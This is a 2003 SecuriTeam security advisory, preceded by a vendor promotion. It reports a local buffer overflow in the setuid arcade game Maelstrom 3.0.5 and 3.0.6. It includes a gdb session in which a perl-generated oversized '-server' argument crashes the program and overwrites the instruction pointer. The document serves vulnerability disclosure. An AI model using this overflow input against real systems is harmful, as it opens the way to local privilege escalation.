[UNIX] Maelstrom Vulnerable to a Local Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 05/18/03

    To: list@securiteam.com
    Date: 18 May 2003 20:14:54 +0200

    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Maelstrom Vulnerable to a Local Buffer Overflow

    SUMMARY

     <http://www.devolution.com/~slouken/Maelstrom/> Maelstrom is an arcade
    game. There is a buffer overflow vulnerability in Maelstrom which allow
    local attacker arbitrary code execution. Exploitation of the vulnerability
    will allow users to gain elevated privileges (as the program is setuid
    'games').

    DETAILS

    Vulnerable systems:
     * Maelstrom 3.0.6
     * Maelstrom 3.0.5

    Example:
    [lucae@linux]$ gdb /usr/bin/Maelstrom

    GNU gdb 5.2.1-2mdk (Mandrake Linux)
    are welcome to change it and/or distribute copies of it under certain
    conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i586-mandrake-linux-gnu"...

    (gdb) set args -server 2@`perl -e 'print "ABCD" x 9999'`
    (gdb) r

    Starting program: /usr/bin/Maelstrom -server 2@`perl -e 'print "ABCD" x
    9999'`
    Couldn't resolve host name for ABCDABC......ABCD

    0x41444342 in ?? ()

    (gdb) Quit

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:luca.ercoli@inwind.it> Luca
    Ercoli.

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.